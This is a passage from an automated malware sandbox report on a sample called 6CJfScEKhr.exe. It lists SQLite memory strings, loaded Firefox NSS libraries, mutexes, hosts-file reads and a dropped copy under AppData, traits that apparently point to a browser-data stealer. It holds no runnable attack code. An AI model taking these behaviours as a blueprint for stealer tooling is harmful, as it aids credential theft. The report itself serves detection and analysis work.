UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_01
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-874F81C6-F6AA357A
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_01
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 6CJfScEKhr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 6CJfScEKhr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.468531219.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495924593.0000000004818000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496441738.0000000004844000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478411129.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478501176.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496387090.0000000004840000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.529520366.000000006FB4A000.00000002.00000001.01000000.0000000B.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492385843.0000000004790000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434513635.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488986283.0000000004970000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493285789.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.443952981.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493168297.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483008786.0000000002A14000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.462331443.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.461364025.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.467718953.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495717285.0000000004808000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.479365495.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478501176.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmp
